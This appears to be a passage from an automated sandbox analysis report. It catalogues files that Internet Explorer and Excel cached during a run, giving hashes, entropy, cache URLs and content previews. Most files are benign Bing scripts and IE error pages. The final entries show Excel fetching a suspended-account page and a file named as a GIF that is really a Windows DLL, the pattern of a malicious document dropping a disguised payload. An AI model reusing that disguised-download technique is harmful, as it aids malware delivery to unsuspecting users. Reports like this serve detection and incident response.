Preview:	var Identity=Identity\|\|{},ham_id_js_downloaded=!1;(function(n,t,i,r,u,f,e){e.wlProfile=function(){var r=sj_cook.get,u="WLS",t=r(u,"N"),i=r(u,"C");return i&&e.wlImgSm&&e.wlImgLg?{displayName:t?t.replace(/\+/g," "):"",name:n(t.replace(/\+/g," ")),img:e.wlImgSm.replace(/\{0\}/g,f(i)),imgL:e.wlImgLg.replace(/\{0\}/g,f(i)),idp:"WL"}:null};e.headerLoginMode=0;e.popupAuthenticate=function(n,i,r){var o,u,h,c,v=sb_gt(),l=Math.floor(v/1e3).toString(),s="ct",a=new RegExp("([?&])"+s+"=.*?(&\|$)","i");return n.toString()==="WindowsLiveId"&&(o=e.popupLoginUrls,u=o[n],u=u.match(a)?u.replace(a,"$1"+s+"="+l+"$2"):u+"?"+s+"="+l,e.popupLoginUrls.WindowsLiveId=u),(o=e.popupLoginUrls)&&(u=o[n]+(i?"&perms="+f(i):"")+(r?"&src="+f(r):""))&&(h=e.pop(u))&&(c=setInterval(function(){h.closed&&(t.fire("id:popup:close"),clearInterval(c))},100))};e.pop=function(n){return r.open(n,"idl","location=no,menubar=no,resizable=no,scrollbars=yes,status=no,titlebar=no,toolbar=no,width=1000,height=620")};var o=u("id_h"),s=u("id

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\dnserror[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	1857
Entropy (8bit):	4.6050684780693905
Encrypted:	false
SSDEEP:	24:rCUcWh0sEimVM4mVMyIjyAV28EFySd8/k+C2E93vjqF4IAr4:uUjEiV4VtLV2lFjq29vjNRr4
MD5:	73C70B34B5F8F158D38A94B9D7766515
SHA1:	E9EAA065BD6585A1B176E13615FD7E6EF96230A9
SHA-256:	3EBD34328A4386B4EBA1F3D5F1252E7BD13744A6918720735020B4689C13FCF4
SHA-512:	927DCD4A8CFDEB0F970CB4EE3F059168B37E1E4E04733ED3356F77CA0448D2145E1ABDD4F7CE1C6CA23C1E3676056894625B17987CC56C84C78E73F60E08FC0D
Malicious:	false
IE Cache URL:	res://ieframe.dll/dnserror.htm
Preview:	.<!DOCTYPE HTML>..<html>.... <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.... <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>This page can’t be displayed</title>.... <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="javascript:getInfo();">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">This page can’t be displayed</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct.</li>.. <li id="task1-2">Look for the page with your search

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\httpErrorPagesScripts[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	8714
Entropy (8bit):	5.312819714818054
Encrypted:	false
SSDEEP:	192:xmjriGCiOciwd1BtvjrG8tAGGGHmjOWnvyJVUXiki3ayimi5ezxiV:xmjriGCi/i+1Btvjy815HmjqVUXiki3g
MD5:	3F57B781CB3EF114DD0B665151571B7B
SHA1:	CE6A63F996DF3A1CCCB81720E21204B825E0238C
SHA-256:	46E019FA34465F4ED096A9665D1827B54553931AD82E98BE01EDB1DDBC94D3AD
SHA-512:	8CBF4EF582332AE7EA605F910AD6F8A4BC28513482409FA84F08943A72CAC2CF0FA32B6AF4C20C697E1FAC2C5BA16B5A64A23AF0C11EEFBF69625B8F9F90C8FA
Malicious:	false
IE Cache URL:	res://ieframe.dll/httpErrorPagesScripts.js
Preview:	...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)\|ftp\|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function expandCollapse(elem,

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\n8-O_KIRNSMPFWQWrGjn0BRH6SM.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	1567
Entropy (8bit):	5.248121948925214
Encrypted:	false
SSDEEP:	48:KyskFELvJnSYVtXpQyL93NzpGaQJWA6vrIhf7:KybivJnSE5aU93HGaQJWAiIh
MD5:	F9D8B007B765D2D1D4A09779E792FE62
SHA1:	C2CBDA98252249E9E1114D1D48679B493CBFA52D
SHA-256:	9400DF53D61861DF8BCD0F53134DF500D58C02B61E65691F39F82659E780F403
SHA-512:	07032D7D9A55D3EA91F0C34C9CD504700095ED8A47E27269D2DDF5360E4CAC9D0FAD1E6BBFC40B79A3BF89AA00C39683388F690BB5196B40E5D662627A2C495A
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/n8-O_KIRNSMPFWQWrGjn0BRH6SM.gz.js
Preview:	var wln=wln\|\|"",Identity;(function(n){function i(n){n.style.display="none";n.setAttribute("aria-hidden","true")}function r(n){n.style.display="inline-block";n.setAttribute("aria-hidden","false")}var u,t;n&&n.sglid&&sj_be&&sj_cook&&sj_evt&&_d&&typeof _d.querySelectorAll!="undefined"&&(u=function(n){var i=n.getAttribute("data-a"),t=n.getAttribute("data-p");i==="false"&&t!=null&&sj_be(n,"click",function(){sj_cook.set("SRCHUSR","POEX",t,!0,"/")})},sj_evt.bind("identityHeaderShown",function(){var n=!1;sj_be(_ge("id_l"),"click",function(){var i,t;if(!n){for(i=_d.querySelectorAll(".b_imi"),t=0;t<i.length;t++)u(i[t]);n=!0}})},!0));sj_evt&&n&&(t=function(t){var h;if(t==null\|\|t.idp!=="orgid"\|\|(h=n.wlProfile(),h==null\|\|h.name==null\|\|t.name!=null)){var e=_ge("id_n"),u=_ge("id_p"),o=_ge("id_s"),s=_ge("id_a"),f=t?t.displayName:wln,c=t?t.img:null,l=t?t.idp:null,a=t?t.cid:null;e&&s&&(a\|\|f)?(u&&c&&(u.title=f,u.src=c,r(u)),f.length>10&&(f=f.substring(0,10).replace(/\s+$/,"")+"."),e.textContent=f,e.inn

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\ozS3T0fsBUPZy4zlY0UX_e0TUwY.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	226
Entropy (8bit):	4.923112772413901
Encrypted:	false
SSDEEP:	6:2LGfGIEW65JcYCgfkF2/WHRMB58IIR/QxbM76Bhl:2RWIyYCwk4/EMB5ZccbM+B/
MD5:	A5363C37B617D36DFD6D25BFB89CA56B
SHA1:	31682AFCE628850B8CB31FAA8E9C4C5EC9EBB957
SHA-256:	8B4D85985E62C264C03C88B31E68DBABDCC9BD42F40032A43800902261FF373F
SHA-512:	E70F996B09E9FA94BA32F83B7AA348DC3A912146F21F9F7A7B5DEEA0F68CF81723AB4FEDF1BA12B46AA4591758339F752A4EBA11539BEB16E0E34AD7EC946763
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/ozS3T0fsBUPZy4zlY0UX_e0TUwY.gz.js
Preview:	(function(n,t,i){if(t){var r=!1,f=function(){r\|\|(r=!0,typeof wlc!="undefined"&&wlc(sj_evt,sj_cook.set,wlc_t))},u=function(){setTimeout(f,t)};n.bind("onP1",function(){i?n.bind("aad:signedout",u):u()},1)}})(sj_evt,wlc_d,wlc_wfa)

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\0J6V279N.htm Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	HTML document, UTF-8 Unicode text, with very long lines, with CRLF, LF line terminators
Category:	downloaded
Size (bytes):	61792
Entropy (8bit):	5.7615300246305825
Encrypted:	false
SSDEEP:	1536:GErSCXrLQRo3HfmlcpUQuY0ETOuKsIecFXdAjvd594fJLYvDrXMb09v+Q53Oprm:GALQy3/XmQuCd59RHey
MD5:	7BAA63B243B5815A2C664EB10EB4A5CB
SHA1:	B8A61A46707D4C6AA81230909FC228F529B87116
SHA-256:	029FB0507BF7213A81D10963680B3B31A58CB9C6AB7E13BFF44AAFC661ADF34A
SHA-512:	47A67252C9CC6F8C91A04275C9C06B47BAB060F54A4183D70C1E3C68E8B83C3F63C76737690EC70F29E8F2408E0273BF0B72D9D32DD8E1B88FFBA949FE5C76B2
Malicious:	false
IE Cache URL:	http://www.bing.com/?form=REDIRERR
Preview:	<!doctype html><html lang="en" dir="ltr"><head><meta name="theme-color" content="#4F4F4F" /><meta name="description" content="Bing helps you turn information into action, making it faster and easier to go from searching to doing." /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><meta property="fb:app_id" content="570810223073062" /><meta property="og:type" content="website" /><meta property="og:title" content="Info" /><meta property="og:image" content="https://www.bing.com/th?id=OHR.AnivaLighthouse_ROW9243451283_tmb.jpg&rf=" /><meta property="og:image:width" content="1366" /><meta property="og:image:height" content="768" /><meta property="og:url" content="https://www.bing.com/?form=HPFBBK&ssd=20210403_0700&mkt=de-CH" /><meta property="og:site_name" content="Bing" /><meta property="og:description" content="The Aniva Lighthouse incredibly stands on top of t" /><title>Bing</title><link rel="shortc

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\5rqGloMo94v3vwNVR5OsxDNd8d0[1].svg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	SVG Scalable Vector Graphics image
Category:	downloaded
Size (bytes):	461
Entropy (8bit):	4.834490109266682
Encrypted:	false
SSDEEP:	6:tI9mc4sl3WGPXN4x7ZguUz/KVqNFvneuFNH2N9wF+tC77LkeWVLKetCsYuwdOvX0:t41WeXNC1f3q/7H2DIZWYeIsrGYyKYx7
MD5:	4E67D347D439EEB1438AA8C0BF671B6B
SHA1:	E6BA86968328F78BF7BF03554793ACC4335DF1DD
SHA-256:	74DEB89D481050FD76A788660674BEA6C2A06B9272D19BC15F4732571502D94A
SHA-512:	BE40E5C7BB0E9F4C1687FFDDBD1FC16F1D2B19B40AB4865BE81DD5CF5F2D8F469E090219A5814B8DAED3E2CD711D4532E648664BFA601D1FF7BBAA83392D320E
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/5rqGloMo94v3vwNVR5OsxDNd8d0.svg
Preview:	<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 32 32"><title>UserSignedOutIcon</title><circle cx="16" cy="16" r="16" fill="#eee"/><path d="M12.73 13.1a3.271 3.271 0 1 1 3.27 3.2 3.237 3.237 0 0 1-3.27-3.2zm-2.73 9.069h1.088a4.91 4.91 0 0 1 9.818 0h1.094a5.884 5.884 0 0 0-3.738-5.434 4.238 4.238 0 0 0 2.1-3.635 4.366 4.366 0 0 0-8.73 0 4.238 4.238 0 0 0 2.1 3.635 5.878 5.878 0 0 0-3.732 5.434z" fill="#666"/><path fill="none" d="M0 0h32v32h-32z"/></svg>

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\ULJCe4CXM2DCjZgELMGm2K4PcPo[1].png Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	PNG image data, 1642 x 116, 8-bit colormap, non-interlaced
Category:	downloaded
Size (bytes):	15917
Entropy (8bit):	7.9392385460477835
Encrypted:	false
SSDEEP:	384:U5vQpWIHNNEojv3nGIsk9MdacywQLntcdejm+sJ/4blz/DXw:Vhl3jj+wcFQLtcMm+K4bR/Dg
MD5:	2D786704B21ADFC7A5037DE337502280
SHA1:	50B2427B80973360C28D98042CC1A6D8AE0F70FA
SHA-256:	54CC8693087FBAF873F72FE9CB4539499A0BC7016225F563DB92B9BFE7EEA564
SHA-512:	625AE0A637BF8B85B86D7719170AAF65ECE69A89CC1E5C76084921A7CABAC226815856D6967403F9264F2C19B4760128C8D10B0FB671D4B9F7A11DBD41B0B6D3
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/ULJCe4CXM2DCjZgELMGm2K4PcPo.png
Preview:	.PNG........IHDR...j...t.............PLTE...uuv.............x.............x.r....................................vxzvwywwx.......w.................". .n....uvy.E9...ww{............x..m..............m.wwy..........l....tyyuxy......vxz.m..n....q...m.........{......vxy///...vv{.m...............twzvvy.........---......wxz!!!...........3.....................................vyy...,,,......................m.......vvxuu\|....L"~............m................lll."..#................vwy....Xx,,,....4........n....vwy....=.......#.....3........*x.0..3..3..1...................................l..$..%..............l........z..;a.........................000.......$.wxz!W.....n....xxx...............413....4.....d!..>............~...Q"qqq......"..www...[[[...Y...................G..)..`...........y..4f.........4....tRNS...0`....`...@_s....A. ...0?....p,.....P?..@...0...~._.aU...o.3.....0.3Q`./y>@^B.^.jP..........C.`.....7..nfc.G.... ..88.%...@.............k...).O...M.@....$.d.i....M

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\Xp-HPHGHOZznHBwdn7OWdva404Y.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	576
Entropy (8bit):	5.192163014367754
Encrypted:	false
SSDEEP:	12:9mPi891gAseP24yXNbdPd1dPkelrR5MdKIKG/OgrfYc3tOfIvHbt:9mPlP5smDy1dV1dHrLMdKIKG/OgLYgtV
MD5:	F5712E664873FDE8EE9044F693CD2DB7
SHA1:	2A30817F3B99E3BE735F4F85BB66DD5EDF6A89F4
SHA-256:	1562669AD323019CDA49A6CF3BDDECE1672282E7275F9D963031B30EA845FFB2
SHA-512:	CA0EB961E52D37CAA75F0F22012C045876A8B1A69DB583FE3232EA6A7787A85BEABC282F104C9FD236DA9A500BA15FDF7BD83C1639BFD73EF8EB6A910B75290D
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/Xp-HPHGHOZznHBwdn7OWdva404Y.gz.js
Preview:	var SsoFrame;(function(n){function t(n){if(n&&n.url&&n.sandbox){var t=sj_ce("iframe"),i=t.style;i.visibility="hidden";i.position="absolute";i.height="0";i.width="0";i.border="none";t.src=decodeURIComponent(n.url);t.id="aadssofr";t.setAttribute("sandbox",n.sandbox);_d.body.appendChild(t);n.currentEpoch&&sj_cook.set("SRCHUSR","T",n.currentEpoch,!0,"/");Log&&Log.Log&&Log.Log("ClientInst","NoSignInAttempt","OrgId",!1)}}function i(n){try{n&&n.length===2&&t(n[1])}catch(i){}}n.createFrame=t;n.ssoFrameEntry=i;sj_evt.bind("ssoFrameExists",i,!0,null,!1)})(SsoFrame\|\|(SsoFrame={}))

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\eaMqCdNxIXjLc0ATep7tsFkfmSA.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	2678
Entropy (8bit):	5.2826483006453255
Encrypted:	false
SSDEEP:	48:5sksiMwg1S0h195DlYt/5ZS/wAtKciZIgDa4V8ahSuf/Z/92zBDZDNJC0x0M:yklg1zbed3SBkdZYcZGVFNJCRM
MD5:	270D1E6437F036799637F0E1DFBDCAB5
SHA1:	5EDC39E2B6B1EF946F200282023DEDA21AC22DDE
SHA-256:	783AC9FA4590EB0F713A5BCB1E402A1CB0EE32BB06B3C7558043D9459F47956E
SHA-512:	10A5CE856D909C5C6618DE662DF1C21FA515D8B508938898E4EE64A70B61BE5F219F50917E4605BB57DB6825C925D37F01695A08A01A3C58E5194268B2F4DB3D
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/eaMqCdNxIXjLc0ATep7tsFkfmSA.gz.js
Preview:	var IPv6Tests;(function(n){function c(t){var r,c,o,l,f,s,i,a,v;try{if(y(),t==null\|\|t.length==0)return;if(r=sj_cook.get(n.ipv6testcookie,n.ipv6testcrumb),r!=null&&r=="1"&&!u)return;if(c=sj_cook.get(n.ipv6testcookie,n.iptypecrumb),r!=null&&c&&u&&(o=Number(r),l=(new Date).getTime(),o!=NaN&&o>l))return;if(f=_d.getElementsByTagName("head")[0],!f)return;if(s="ipV6TestScript"+t,i=sj_ce("script",s),i.type="text/javascript",i.async=!0,i.onerror=function(){Log.Log("ipv6test","IPv6Test Dom_ "+t,"IPv6TestError",!1,"Error","JSONP call resulted in error.")},a=_ge(s),a&&f)return;f.insertBefore(i,f.firstChild);i.setAttribute("src",_w.location.protocol+"//"+t+".bing.com/ipv6test/test");e&&p();v=u?(new Date).getTime()+h:"1";sj_cook.set(n.ipv6testcookie,n.ipv6testcrumb,v.toString(),!1)}catch(w){Log.Log("ipv6test","Dom_ "+t,"IPv6TestError",!1,"Error","Failed to make JSONP call. Exception - "+w.message)}}function l(t){if(!t){Log.Log("ipv6test","IPv6TestResponseError","IPv6TestError",!1,"Error","Got null re

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\suspendedpage[1].htm Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	HTML document, ASCII text, with very long lines
Category:	downloaded
Size (bytes):	7614
Entropy (8bit):	5.643196429180972
Encrypted:	false
SSDEEP:	192:olVZHCkA26xd3Q4JRveuTtMy47R/Ga0kVhFuPwf8Pn9wHHyJcf:QJvVGaRF8I80
MD5:	116091ED739B7E0F1AD7F819560A0602
SHA1:	C30A527A2A5F25BC1A63359CAD76A8BAB67CB4FB
SHA-256:	0445F0A98A263C472AE1C8D8E28275AFEA1BDDD7692746AA5286097B311B29B1
SHA-512:	83F16BCA5EA4062470B8807912F10B6D743C2DEF2261B4E16098EA8FC1DCB6692CBBD4C6870F27408422B75A3CDCD46A3856AB2162177ED2386D4B8188C122E8
Malicious:	false
IE Cache URL:	https://vts.us.com/cgi-sys/suspendedpage.cgi
Preview:	<!DOCTYPE html>.<html>. <head>. <meta http-equiv="Content-type" content="text/html; charset=utf-8">. <meta http-equiv="Cache-control" content="no-cache">. <meta http-equiv="Pragma" content="no-cache">. <meta http-equiv="Expires" content="0">. <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=1">. <title>Account Suspended</title>. <link rel="stylesheet" href="//use.fontawesome.com/releases/v5.0.6/css/all.css">. <style type="text/css">. body {. font-family: Arial, Helvetica, sans-serif;. font-size: 14px;. line-height: 1.428571429;. background-color: #ffffff;. color: #2F3230;. padding: 0;. margin: 0;. }. section {. display: block;. padding: 0;. margin: 0;. }. .container {. margin-left: auto;. margin-right: auto;. padding: 0 10px;.

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\MstqcgNaYngCBavkktAoSE0--po.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	391
Entropy (8bit):	5.184440623275194
Encrypted:	false
SSDEEP:	12:2Qxjl/mLAHPWEaaGRHkj6iLUEkFKgs5qHT:2QC8H+aGRHk+i1kFKgs5qHT
MD5:	55EC2297C0CF262C5FA9332F97C1B77A
SHA1:	92640E3D0A7CBE5D47BC8F0F7CC9362E82489D23
SHA-256:	342C3DD52A8A456F53093671D8D91F7AF5B3299D72D60EDB28E4F506368C6467
SHA-512:	D070B9C415298A0F25234D1D7EAFB8BAE0D709590D3C806FCEAEC6631FDA37DFFCA40F785C86C4655AA075522E804B79A7843C647F1E98D97CCE599336DD9D59
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/MstqcgNaYngCBavkktAoSE0--po.gz.js
Preview:	(function(){function n(){var n=_ge("id_p"),t,i;n&&(t="",i="",n.dataset?(t=n.dataset.src,i=n.dataset.alt):(t=n.getAttribute("data-src"),i=n.getAttribute("data-alt")),t&&t!=""&&(n.onerror=function(){n.onerror=null;n.src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAQAAAC1HAwCAAAAC0lEQVR42mNgYAAAAAMAASsJTYQAAAAASUVORK5CYII=";n.alt=""},n.onload=function(){n.alt=i},n.src=t))}n()})()

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\bLULVERLX4vU6bjspboNMw9vl_0.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	very short file (no magic)
Category:	downloaded
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:V:V
MD5:	CFCD208495D565EF66E7DFF9F98764DA
SHA1:	B6589FC6AB0DC82CF12099D1C2D40AB994E8410C
SHA-256:	5FECEB66FFC86F38D952786C6D696C79C2DBC239DD4E91B46729D73A27FB57E9
SHA-512:	31BCA02094EB78126A517B206A88C73CFA9EC6F704C7030D18212CACE820F025F00BF0EA68DBF3F3A5436CA63B53BF7BF80AD8D5DE7D8359D0B7FED9DBC3AB99
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/bLULVERLX4vU6bjspboNMw9vl_0.gz.js
Preview:	0

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\eRYlUYIMYsB_Pt8B7FTik-pl5cs.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	ASCII text, with no line terminators
Category:	downloaded
Size (bytes):	229
Entropy (8bit):	4.773871204083538
Encrypted:	false
SSDEEP:	3:2LGffIc6CaA5FSAGG4Aj6NhyII6RwZtSAnM+LAX6jUYkjdnwO6yJxWbMPJ/WrE6J:2LGXX6wFSADj6iIunnyh6TbMFsise2
MD5:	EEE26AAC05916E789B25E56157B2C712
SHA1:	5B35C3F44331CC91FC4BAB7D2D710C90E538BC8B
SHA-256:	249BCDCAA655BDEE9D61EDFF9D93544FA343E0C2B4DCA4EC4264AF2CB00216C2
SHA-512:	A664F5A91230C0715758416ADACEEAEFDC9E1A567A20A2331A476A82E08DF7268914DA2F085846A744B073011FD36B1FB47B8E4EED3A0C9F908790439C930538
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/eRYlUYIMYsB_Pt8B7FTik-pl5cs.gz.js
Preview:	(function(){var t=_ge("id_h"),n=_ge("langChange"),i=_ge("me_header"),r=_ge("langDId"),u=_ge("mapContainer");t!=null&&n!=null&&i==null&&(r===null\|\|u===null)&&(t.insertBefore(n,t.firstChild),n.className=n.className+" langdisp")})()

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\errorPageStrings[1] Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:	downloaded
Size (bytes):	3470
Entropy (8bit):	5.076790888059907
Encrypted:	false
SSDEEP:	96:z9UUiqRxqH211CUIRHERyRyntQRXaR8RS6C87a/5/+mhPcF+5g+mOC53B5Fqs1qP:JsUOHaQyYX4yJQOWCbz1Qb5
MD5:	6B26ECFA58E37D4B5EC861FCDD3F04FA
SHA1:	B69CD71F68FE35A9CE0D7EA17B5F1B2BAD9EA8FA
SHA-256:	7F7D1069CA8A852C1C8EB36E1D988FE6A9C17ECB8EFF1F66FC5EBFEB5418723A
SHA-512:	1676D43B977C07A3F6A5473F12FD16E56487803A1CB9771D0F189B1201642EE79480C33A010F08DC521E57332EC4C4D888D693C6A2323C97750E97640918C3F4
Malicious:	false
IE Cache URL:	res://ieframe.dll/errorPageStrings.js
Preview:	.//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "The security certificate presented by this website was not issued by a trusted certificate authority.";..var L_CertExpired_TEXT = "The security certificate presented by this website has expired or is not yet valid.";..var L_CertCNMismatch_TEXT = "The security certificate presented by this website was issued for a di

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\favicon[1].ico Download File
Process:	C:\Program Files\Internet Explorer\iexplore.exe
File Type:	MS Windows icon resource - 1 icon, 32x32, 32 bits/pixel
Category:	downloaded
Size (bytes):	4286
Entropy (8bit):	3.8046022951415335
Encrypted:	false
SSDEEP:	24:suZOWcCXPRS4QAUs/KBy3TYI42Apvl6wheXpktCH2Yn4KgISQggggFpz1k9PAYHu:HBRh+sCBykteatiBn4KWi1+Ne
MD5:	DA597791BE3B6E732F0BC8B20E38EE62
SHA1:	1125C45D285C360542027D7554A5C442288974DE
SHA-256:	5B2C34B3C4E8DD898B664DBA6C3786E2FF9869EFF55D673AA48361F11325ED07
SHA-512:	D8DC8358727590A1ED74DC70356AEDC0499552C2DC0CD4F7A01853DD85CEB3AEAD5FBDC7C75D7DA36DB6AF2448CE5ABDFF64CEBDCA3533ECAD953C061A9B338E
Malicious:	false
IE Cache URL:	http://www.bing.com/favicon.ico
Preview:	...... .... .........(... ...@..... ...................................................................................................................................................................................................N...Sz..R...R...P...N..L..H..DG..........................................................................................R6..U...U...S...R...P...N..L..I..F..B...7...............................................................................S6..V...V...U...S...R...P...N..L..I..F..C...?..:z......................................................................O...W...V...V...U...S...R...P...N..L..I..E..C...?...;..{7..q2$..............................................................T..D..]...S)..p6..J...R...P...N..L..I..E..B..>..;..z7..p2..f,X.........................................................A..O#..N!..N!..N!..P$..q:...P...N..K..I..E..A..=..9..x5..n0..e,...5...................................................Ea.Z,..T$..T$..T

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\hsq54HXv3E6bOWi_58PaE6vwTYM.gz[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	exported SGML document, ASCII text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	4424
Entropy (8bit):	5.151067247813042
Encrypted:	false
SSDEEP:	96:B3D+ca6IQkQQX6hJmK/Kl9L3vVPTkyfXeJLYLZq76NH:V+ca6IBQQX6aKClFfVPTkyWJLW/
MD5:	FA0E965181E637575B37390656518D0D
SHA1:	06F24D11B54319BE23CDB7C8EEB9D79AAD9CFD06
SHA-256:	4CCC277A590605079234A0C82BFB6C0909B72453D8A45DCACF64463BC429492C
SHA-512:	CA8557ACBC8F7EDEF64FFB0C8A1A7AACE917848FDFA5D3A0ED2867999C6D994DC5E12CEE70E4771C7B0C9C1638071495BD771945FB204B9CFCC589386FFF3A40
Malicious:	false
IE Cache URL:	http://www.bing.com/rp/hsq54HXv3E6bOWi_58PaE6vwTYM.gz.js
Preview:	define("rmsajax",["require","exports"],function(n,t){function c(){for(var i,n=[],t=0;t<arguments.length;t++)n[t]=arguments[t];if(n.length!=0){if(i=n[n.length-1],n.length==1)ot(i)&&f.push(i);else if(n.length==3){var o=n[0],s=n[1],u=n[2];st(o)&&st(s)&&ot(u)&&(ht(r,o,u),ht(e,s,u))}return window.rms}}function nt(){var i=arguments,n,t;for(o.push(i),n=0;n<i.length;n++)t=i[n],ct(t,r),t.d&&tt.call(null,t);return window.rms}function kt(){var t=arguments,n;for(s.push(t),n=0;n<t.length;n++)ct(t[n],e);return window.rms}function l(){var t,i,n;for(ri(),t=!1,n=0;n<o.length;n++)t=tt.apply(null,p.call(o[n],0))\|\|t;for(i=0;i<s.length;i++)t=ti.apply(null,p.call(s[i],0))\|\|t;if(!t)for(n=0;n<f.length;n++)f[n]()}function tt(){var n=arguments,t,i,f,e;if(n.length===0)return!1;if(t=r[ut(n[0])],n.length>1)for(i=ui.apply(null,n),f=0;f<i.length;f++)e=i[f],e.run=u,dt(e,function(n){return function(){gt(n,i)}}(e));else t.run=u,ft(t,function(){it(t)});return!0}function dt(n,t){var f,u,r;if(!n.state){if(n.state=pt,at(n)

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\0104[1].gif Download File
Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	downloaded
Size (bytes):	107396
Entropy (8bit):	5.804743169573023
Encrypted:	false
